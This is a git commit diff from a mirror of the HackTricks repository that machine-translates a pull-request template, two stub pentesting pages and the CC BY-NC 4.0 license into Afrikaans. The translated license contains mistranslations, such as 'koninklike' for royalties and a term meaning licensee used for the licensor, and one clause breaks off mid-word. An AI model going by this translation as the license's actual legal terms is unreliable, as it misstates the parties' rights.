Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-21 20:23:18 +00:00
Code Issues Projects Releases Packages Wiki Activity

Translated to Afrikaans

Browse source
This commit is contained in:
Translator workflow 2024-02-11 02:07:06 +00:00
parent cfe2830fdd
commit 9f40607d8c
726 changed files with 75997 additions and 65033 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

6
.github/pull_request_template.md vendored
View file

@ -1,4 +1,4 @@
## Attribution
We value your knowledge and encourage you to share content. Please ensure that you only upload content that you own or have explicit permission to use from the original author. Your respect for intellectual property rights fosters a trustworthy and legal sharing environment for everyone.
## Toewysing
Ons waardeer jou kennis en moedig jou aan om inhoud te deel. Maak asseblief seker dat jy slegs inhoud oplaai wat jy besit of uitdruklike toestemming het van die oorspronklike skrywer om dit te gebruik. Jou respek vir intellektuele eiendomsregte bevorder 'n betroubare en wettige deelomgewing vir almal.
Thank you for contributing to HackTricks!
Dankie dat jy bydra tot HackTricks!

50
1911-pentesting-fox.md
View file

@ -1,53 +1,27 @@
# 1911 - Pentesting fox
# 1911 - Pentesting vos
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
</details>
And more services:
En meer dienste:
ubiquiti-discover udp "Ubiquiti Networks Device"
ubiquiti-ontdek udp "Ubiquiti Networks-toestel"
dht udp "DHT Nodes"
dht udp "DHT-nodes"
5060 udp sip "SIP/"
![](<.gitbook/assets/image (273).png>)
![](<.gitbook/assets/image (345) (2) (2) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (3).png>)
InfluxDB
![](<.gitbook/assets/image (337).png>)
![](<.gitbook/assets/image (338).png>)
![](<.gitbook/assets/image (339).png>)
![](<.gitbook/assets/image (340).png>)
![](<.gitbook/assets/image (341).png>)
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
![](<.gitbook/assets/image (345) (2) (2) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (

32
6881-udp-pentesting-bittorrent.md
View file

@ -1,16 +1,14 @@
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
</details>
@ -19,16 +17,14 @@ Other ways to support HackTricks:
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
</details>

205
LICENSE.md
View file

@ -1,204 +1,151 @@
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
</details>
<a rel="license" href="https://creativecommons.org/licenses/by-nc/4.0/"><img alt="Creative Commons License" style="border-width:0" src="https://licensebuttons.net/l/by-nc/4.0/88x31.png" /></a><br>Copyright © Carlos Polop 2021. Except where otherwise specified (the external information copied into the book belongs to the original authors), the text on <a href="https://github.com/carlospolop/hacktricks">HACK TRICKS</a> by Carlos Polop is licensed under the <a href="https://creativecommons.org/licenses/by-nc/4.0/">Creative Commons Attribution-NonCommercial 4.0 International (CC BY-NC 4.0)</a>.
<a rel="license" href="https://creativecommons.org/licenses/by-nc/4.0/"><img alt="Creative Commons License" style="border-width:0" src="https://licensebuttons.net/l/by-nc/4.0/88x31.png" /></a><br>Kopiereg © Carlos Polop 2021. Behalwe waar anders gespesifiseer (die eksterne inligting wat in die boek gekopieer is, behoort aan die oorspronklike outeurs), is die teks op <a href="https://github.com/carlospolop/hacktricks">HACK TRICKS</a> deur Carlos Polop gelisensieer onder die <a href="https://creativecommons.org/licenses/by-nc/4.0/">Creative Commons Attribution-NonCommercial 4.0 International (CC BY-NC 4.0)</a>.
License: Attribution-NonCommercial 4.0 International (CC BY-NC 4.0)<br>
Human Readable License: https://creativecommons.org/licenses/by-nc/4.0/<br>
Complete Legal Terms: https://creativecommons.org/licenses/by-nc/4.0/legalcode<br>
Formatting: https://github.com/jmatsushita/Creative-Commons-4.0-Markdown/blob/master/licenses/by-nc.markdown<br>
Lisensie: Attribution-NonCommercial 4.0 International (CC BY-NC 4.0)<br>
Mensleesbare Lisensie: https://creativecommons.org/licenses/by-nc/4.0/<br>
Volledige Regsterme: https://creativecommons.org/licenses/by-nc/4.0/legalcode<br>
Formattering: https://github.com/jmatsushita/Creative-Commons-4.0-Markdown/blob/master/licenses/by-nc.markdown<br>
# creative commons
# kreatiewe gemeenskap
# Attribution-NonCommercial 4.0 International
Creative Commons Corporation (“Creative Commons”) is not a law firm and does not provide legal services or legal advice. Distribution of Creative Commons public licenses does not create a lawyer-client or other relationship. Creative Commons makes its licenses and related information available on an “as-is” basis. Creative Commons gives no warranties regarding its licenses, any material licensed under their terms and conditions, or any related information. Creative Commons disclaims all liability for damages resulting from their use to the fullest extent possible.
Creative Commons Corporation ("Creative Commons") is nie 'n regspraktyk nie en verskaf nie regsadvies of regsdiens nie. Verspreiding van Creative Commons openbare lisensies skep nie 'n regsverhouding tussen regspraktisyn en kliënt of enige ander verhouding nie. Creative Commons maak sy lisensies en verwante inligting beskikbaar "soos dit is". Creative Commons gee geen waarborge met betrekking tot sy lisensies, enige materiaal wat onder die voorwaardes daarvan gelisensieer is, of enige verwante inligting nie. Creative Commons verwerp alle aanspreeklikheid vir skade wat voortspruit uit die gebruik daarvan tot die volle omvang moontlik.
## Using Creative Commons Public Licenses
## Gebruik van Creative Commons Openbare Lisensies
Creative Commons public licenses provide a standard set of terms and conditions that creators and other rights holders may use to share original works of authorship and other material subject to copyright and certain other rights specified in the public license below. The following considerations are for informational purposes only, are not exhaustive, and do not form part of our licenses.
Creative Commons openbare lisensies bied 'n standaardstel voorwaardes wat skeppers en ander reghebbendes kan gebruik om oorspronklike werke van outeurskap en ander materiaal wat onderhewig is aan kopiereg en sekere ander regte soos gespesifiseer in die openbare lisensie hieronder, te deel. Die volgende oorwegings is slegs vir inligtingsdoeleindes, is nie uitputtend nie, en vorm nie deel van ons lisensies nie.
* __Considerations for licensors:__ Our public licenses are intended for use by those authorized to give the public permission to use material in ways otherwise restricted by copyright and certain other rights. Our licenses are irrevocable. Licensors should read and understand the terms and conditions of the license they choose before applying it. Licensors should also secure all rights necessary before applying our licenses so that the public can reuse the material as expected. Licensors should clearly mark any material not subject to the license. This includes other CC-licensed material, or material used under an exception or limitation to copyright. [More considerations for licensors](http://wiki.creativecommons.org/Considerations_for_licensors_and_licensees#Considerations_for_licensors).
* __Oorwegings vir lisensiegevers:__ Ons openbare lisensies is bedoel vir gebruik deur diegene wat gemagtig is om die publiek toestemming te gee om materiaal op maniere te gebruik wat andersins deur kopiereg en sekere ander regte beperk word. Ons lisensies is onherroeplik. Lisensiegevers moet die terme en voorwaardes van die lisensie wat hulle kies, lees en verstaan voordat hulle dit toepas. Lisensiegevers moet ook alle regte verseker voordat hulle ons lisensies toepas, sodat die publiek die materiaal kan hergebruik soos verwag. Lisensiegevers moet enige materiaal wat nie onderhewig is aan die lisensie nie, duidelik merk. Dit sluit ander CC-gelisensieerde materiaal in, of materiaal wat onder 'n uitsondering of beperking tot kopiereg gebruik word. [Meer oorwegings vir lisensiegevers](http://wiki.creativecommons.org/Considerations_for_licensors_and_licensees#Considerations_for_licensors).
* __Considerations for the public:__ By using one of our public licenses, a licensor grants the public permission to use the licensed material under specified terms and conditions. If the licensors permission is not necessary for any reasonfor example, because of any applicable exception or limitation to copyrightthen that use is not regulated by the license. Our licenses grant only permissions under copyright and certain other rights that a licensor has authority to grant. Use of the licensed material may still be restricted for other reasons, including because others have copyright or other rights in the material. A licensor may make special requests, such as asking that all changes be marked or described. Although not required by our licenses, you are encouraged to respect those requests where reasonable. [More considerations for the public](http://wiki.creativecommons.org/Considerations_for_licensors_and_licensees#Considerations_for_licensees).
* __Oorwegings vir die publiek:__ Deur een van ons openbare lisensies te gebruik, gee 'n lisensiegever die publiek toestemming om die gelisensieerde materiaal te gebruik onder gespesifiseerde terme en voorwaardes. As die toestemming van die lisensiegever nie nodig is om enige rede nie byvoorbeeld as gevolg van enige toepaslike uitsondering of beperking tot kopiereg word daardie gebruik nie deur die lisensie gereguleer nie. Ons lisensies verleen slegs toestemmings onder kopiereg en sekere ander regte waaroor 'n lisensiegever magtig is om toestemming te gee. Die gebruik van die gelisensieerde materiaal kan nog steeds beperk word om ander redes, insluitend omdat ander kopiereg of ander regte in die materiaal het. 'n Lisensiegever mag spesiale versoeke maak, soos om te vra dat alle veranderinge gemerk of beskryf word. Alhoewel dit nie deur ons lisensies vereis word nie, word jy aangemoedig om daardie versoeke te respekteer waar dit redelik is. [Meer oorwegings vir die publiek](http://wiki.creativecommons.org/Considerations_for_licensors_and_licensees#Considerations_for_licensees).
# Creative Commons Attribution-NonCommercial 4.0 International Public License
# Creative Commons Attribution-NonCommercial 4.0 International Openbare Lisensie
By exercising the Licensed Rights (defined below), You accept and agree to be bound by the terms and conditions of this Creative Commons Attribution-NonCommercial 4.0 International Public License ("Public License"). To the extent this Public License may be interpreted as a contract, You are granted the Licensed Rights in consideration of Your acceptance of these terms and conditions, and the Licensor grants You such rights in consideration of benefits the Licensor receives from making the Licensed Material available under these terms and conditions.
Deur die Gelisensieerde Regte (hieronder gedefinieer) uit te oefen, aanvaar en stem jy in om gebonde te wees aan die terme en voorwaardes van hierdie Creative Commons Attribution-NonCommercial 4.0 International Openbare Lisensie ("Openbare Lisensie"). Vir sover hierdie Openbare Lisensie as 'n kontrak geïnterpreteer kan word, word die Gelisensieerde Regte aan jou verleen in oorweging van jou aanvaarding van hierdie terme en voorwaardes, en die Lisensiegever verleen jou sulke regte in oorweging van die voordele wat die Lisensiegever ontvang deur die Gelisensieerde Materiaal beskikbaar te stel onder hierdie terme en voorwaardes.
## Section 1 Definitions.
## Artikel 1 Definisies.
a. __Adapted Material__ means material subject to Copyright and Similar Rights that is derived from or based upon the Licensed Material and in which the Licensed Material is translated, altered, arranged, transformed, or otherwise modified in a manner requiring permission under the Copyright and Similar Rights held by the Licensor. For purposes of this Public License, where the Licensed Material is a musical work, performance, or sound recording, Adapted Material is always produced where the Licensed Material is synched in timed relation with a moving image.
a. __Aangepaste Materiaal__ beteken materiaal wat onderhewig is aan Kopiereg en Soortgelyke Regte en wat afgelei is van of gebaseer is op die Gelisensieerde Materiaal en waarin die Gelisensieerde Materiaal vertaal, verander, gereël, verander, of andersins gewysig word op 'n wyse wat toestemming vereis onder die Kopiereg en Soortgelyke Regte wat deur die Lisensiegever gehou word. Vir doeleindes van hierdie Openbare Lisensie word Aangepaste Materiaal altyd geproduseer waar die Gelisensieerde Materiaal gesinkroniseer word met 'n bewegende beeld.
b. __Adapter's License__ means the license You apply to Your Copyright and Similar Rights in Your contributions to Adapted Material in accordance with the terms and conditions of this Public License.
b. __Lisensie van die Aanpasser__ beteken die lisensie wat jy toepas op jou Kopiereg en Soortgelyke Regte in jou bydraes tot Aangepaste Materiaal in ooreenstem
## Artikel 2 - Omvang.
c. __Copyright and Similar Rights__ means copyright and/or similar rights closely related to copyright including, without limitation, performance, broadcast, sound recording, and Sui Generis Database Rights, without regard to how the rights are labeled or categorized. For purposes of this Public License, the rights specified in Section 2(b)(1)-(2) are not Copyright and Similar Rights.
a. ___Lisensieverlening.___
d. __Effective Technological Measures__ means those measures that, in the absence of proper authority, may not be circumvented under laws fulfilling obligations under Article 11 of the WIPO Copyright Treaty adopted on December 20, 1996, and/or similar international agreements.
1. Onderworpe aan die bepalings en voorwaardes van hierdie Openbare Lisensie, verleen die Lisensiehouer hiermee aan U 'n wêreldwye, vry van lisensiefooi, nie-onderlisensieerbare, nie-uitsluitlike, onherroeplike lisensie om die Gelisensieerde Regte in die Gelisensieerde Materiaal uit te oefen om:
e. __Exceptions and Limitations__ means fair use, fair dealing, and/or any other exception or limitation to Copyright and Similar Rights that applies to Your use of the Licensed Material.
A. die Gelisensieerde Materiaal, geheel of gedeeltelik, vir nie-kommersiële doeleindes slegs te verveelvoudig en te deel; en
f. __Licensed Material__ means the artistic or literary work, database, or other material to which the Licensor applied this Public License.
B. Aangepaste Materiaal te produseer, te verveelvoudig en te deel vir nie-kommersiële doeleindes slegs.
g. __Licensed Rights__ means the rights granted to You subject to the terms and conditions of this Public License, which are limited to all Copyright and Similar Rights that apply to Your use of the Licensed Material and that the Licensor has authority to license.
2. __Uitsonderings en Beperkings.__ Vir die vermyding van twyfel, waar Uitsonderings en Beperkings van toepassing is op U gebruik, is hierdie Openbare Lisensie nie van toepassing nie, en U hoef nie aan sy bepalings en voorwaardes te voldoen nie.
h. __Licensor__ means the individual(s) or entity(ies) granting rights under this Public License.
3. __Termyn.__ Die termyn van hierdie Openbare Lisensie word gespesifiseer in Artikel 6(a).
i. __NonCommercial__ means not primarily intended for or directed towards commercial advantage or monetary compensation. For purposes of this Public License, the exchange of the Licensed Material for other material subject to Copyright and Similar Rights by digital file-sharing or similar means is NonCommercial provided there is no payment of monetary compensation in connection with the exchange.
4. __Media en formate; tegniese wysigings toegelaat.__ Die Lisensiehouer gee U toestemming om die Gelisensieerde Regte in alle media en formate uit te oefen, hetsy nou bekend of hierna geskep, en om tegniese wysigings te maak wat nodig is om dit te doen. Die Lisensiehouer doen afstand van en/of stem daarmee saam om enige reg of gesag te ontken om U te verbied om tegniese wysigings te maak wat nodig is om die Gelisensieerde Regte uit te oefen, insluitend tegniese wysigings wat nodig is om Effektiewe Tegnologiese Maatreëls te omseil. Vir doeleindes van hierdie Openbare Lisensie, produseer die eenvoudige maak van wysigings wat deur hierdie Artikel 2(a)(4) gemagtig word nooit Aangepaste Materiaal nie.
j. __Share__ means to provide material to the public by any means or process that requires permission under the Licensed Rights, such as reproduction, public display, public performance, distribution, dissemination, communication, or importation, and to make material available to the public including in ways that members of the public may access the material from a place and at a time individually chosen by them.
5. __Ontvangers van stroomaf.__
k. __Sui Generis Database Rights__ means rights other than copyright resulting from Directive 96/9/EC of the European Parliament and of the Council of 11 March 1996 on the legal protection of databases, as amended and/or succeeded, as well as other essentially equivalent rights anywhere in the world.
A. __Aanbod van die Lisensiehouer - Gelisensieerde Materiaal.__ Elke ontvanger van die Gelisensieerde Materiaal ontvang outomaties 'n aanbod van die Lisensiehouer om die Gelisensieerde Regte uit te oefen onder die bepalings en voorwaardes van hierdie Openbare Lisensie.
l. __You__ means the individual or entity exercising the Licensed Rights under this Public License. Your has a corresponding meaning.
B. __Geen stroomafbeperkings nie.__ U mag geen addisionele of verskillende terme of voorwaardes aanbied of opleg op die Gelisensieerde Materiaal nie, as dit die uitoefening van die Gelisensieerde Regte deur enige ontvanger van die Gelisensieerde Materiaal beperk nie.
## Section 2 Scope.
6. __Geen goedkeuring.__ Niks in hierdie Openbare Lisensie stel of mag beskou word as toestemming om te beweer of te impliseer dat U, of dat U gebruik van die Gelisensieerde Materiaal, verband hou met, of gesponsoreer, ondersteun, of amptelike status verleen deur, die Lisensiehouer of ander persone wat aangewys is om erkenning te ontvang soos voorsien in Artikel 3(a)(1)(A)(i).
a. ___License grant.___
b. ___Ander regte.___
1. Subject to the terms and conditions of this Public License, the Licensor hereby grants You a worldwide, royalty-free, non-sublicensable, non-exclusive, irrevocable license to exercise the Licensed Rights in the Licensed Material to:
1. Morele regte, soos die reg op integriteit, word nie onder hierdie Openbare Lisensie gelisensieer nie, en ook nie publisiteit, privaatheid, en/of ander soortgelyke persoonlikheidsregte nie; egter, vir sover moontlik, doen die Lisensiehouer afstand van en/of stem daarmee saam om enige sulke regte wat deur die Lisensiehouer gehou word, tot die beperkte mate wat nodig is om U in staat te stel om die Gelisensieerde Regte uit te oefen, maar andersins nie.
A. reproduce and Share the Licensed Material, in whole or in part, for NonCommercial purposes only; and
2. Patent- en handelsmerkregte word nie onder hierdie Openbare Lisensie gelisensieer nie.
B. produce, reproduce, and Share Adapted Material for NonCommercial purposes only.
3. Vir sover moontlik, doen die Lisensiehouer afstand van enige reg om koninklike te erf van U vir die uitoefening van die Gelisensieerde Regte, hetsy direk of deur 'n inwinninggenootskap onder enige vrywillige of afstanddoenbare statutêre of verpligte lisensiëringskema. In alle ander gevalle behou die Lisensiehouer uitdruklik enige reg voor om sulke koninklike in te samel, insluitend wanneer die Gelisensieerde Materiaal gebruik word vir nie-kommersiële doeleindes nie.
2. __Exceptions and Limitations.__ For the avoidance of doubt, where Exceptions and Limitations apply to Your use, this Public License does not apply, and You do not need to comply with its terms and conditions.
3. __Term.__ The term of this Public License is specified in Section 6(a).
## Artikel 3 - Lisensievoorwaardes.
4. __Media and formats; technical modifications allowed.__ The Licensor authorizes You to exercise the Licensed Rights in all media and formats whether now known or hereafter created, and to make technical modifications necessary to do so. The Licensor waives and/or agrees not to assert any right or authority to forbid You from making technical modifications necessary to exercise the Licensed Rights, including technical modifications necessary to circumvent Effective Technological Measures. For purposes of this Public License, simply making modifications authorized by this Section 2(a)(4) never produces Adapted Material.
5. __Downstream recipients.__
U uitoefening van die Gelisensieerde Regte is uitdruklik onderhewig aan die volgende voorwaardes.
A. __Offer from the Licensor Licensed Material.__ Every recipient of the Licensed Material automatically receives an offer from the Licensor to exercise the Licensed Rights under the terms and conditions of this Public License.
a. ___Toekennings.___
B. __No downstream restrictions.__ You may not offer or impose any additional or different terms or conditions on, or apply any Effective Technological Measures to, the Licensed Material if doing so restricts exercise of the Licensed Rights by any recipient of the Licensed Material.
1. As U die Gelisensieerde Materiaal deel (insluitend in gewysigde vorm), moet U:
6. __No endorsement.__ Nothing in this Public License constitutes or may be construed as permission to assert or imply that You are, or that Your use of the Licensed Material is, connected with, or sponsored, endorsed, or granted official status by, the Licensor or others designated to receive attribution as provided in Section 3(a)(1)(A)(i).
b. ___Other rights.___
A. die volgende behou as dit deur die Lisensiehouer saam met die Gelisensieerde Materiaal voorsien word:
1. Moral rights, such as the right of integrity, are not licensed under this Public License, nor are publicity, privacy, and/or other similar personality rights; however, to the extent possible, the Licensor waives and/or agrees not to assert any such rights held by the Licensor to the limited extent necessary to allow You to exercise the Licensed Rights, but not otherwise.
i. identifikasie van die skepper(s) van die Gelisensieerde Materiaal en enige ander persone wat aangewys is om erkenning te ontvang, op enige redelike wyse wat deur die Lisensiehouer versoek word (insluitend deur skuilnaam as dit aangewys word);
2. Patent and trademark rights are not licensed under this Public License.
ii. 'n kopieregkennisgewing;
3. To the extent possible, the Licensor waives any right to collect royalties from You for the exercise of the Licensed Rights, whether directly or through a collecting society under any voluntary or waivable statutory or compulsory licensing scheme. In all other cases the Licensor expressly reserves any right to collect such royalties, including when the Licensed Material is used other than for NonCommercial purposes.
## Section 3 License Conditions.
iii. 'n kennisgewing wat na hierdie Openbare Lisensie verwys;
Your exercise of the Licensed Rights is expressly made subject to the following conditions.
iv. 'n kennisgewing wat na die vrywaring van waarborge verwys;
a. ___Attribution.___
v. 'n URI of skakel na die Gelisensieerde Materiaal, vir sover dit redelik uitvoerbaar is;
1. If You Share the Licensed Material (including in modified form), You must:
B. aandui of U die Gelisensieerde Materiaal gewysig het en 'n aanduiding van enige vorige wysigings behou; en
A. retain the following if it is supplied by the Licensor with the Licensed Material:
C. aandui dat die Gelisensieerde Materiaal gelisensieer is onder hierdie Openbare Lisensie, en die teks van, of die URI of skakel na, hierdie Openbare Lisensie insluit.
i. identification of the creator(s) of the Licensed Material and any others designated to receive attribution, in any reasonable manner requested by the Licensor (including by pseudonym if designated);
2. U kan aan die voorwaardes in Artikel 3(a)(1) voldoen op enige redelike wyse gebaseer op die medium, middels, en konteks waarin U die Gelisensieerde Materiaal deel. Byvoorbeeld, dit mag redelik wees om aan die voorwaardes te voldoen deur 'n URI of skakel na 'n hulpbron te voorsien wat die vereiste inligting insluit.
ii. a copyright notice;
3. Indien versoek deur die Lisensiehouer, moet U enige van die inligting wat vereis word deur Artikel 3(a)(1)(A) verwyder, vir sover dit redelik uitvoerbaar is.
iii. a notice that refers to this Public License;
4. As U Aangepaste Materiaal wat U produseer deel, mag die Lisensie van die Aanpasser wat U toepas, nie ontvangers van die Aangepaste Materiaal verhoed om aan hierdie Openbare Lisensie te voldoen nie.
iv. a notice that refers to the disclaimer of warranties;
## Artikel 4 - Sui Generis Databasisregte.
v. a URI or hyperlink to the Licensed Material to the extent reasonably practicable;
Waar die Gelisensieerde Regte Sui Generis Databasisregte insluit wat van toepassing is op U gebruik van die Gelisensieerde Materiaal:
B. indicate if You modified the Licensed Material and retain an indication of any previous modifications; and
a. vir die vermyding van twyfel, verleen Artikel 2(a)(1) U die reg om al of 'n aansienlike gedeelte van die inhoud van die databasis te onttrek, hergebruik, verveelvoudig, en te deel vir nie-kommersiële doeleindes slegs;
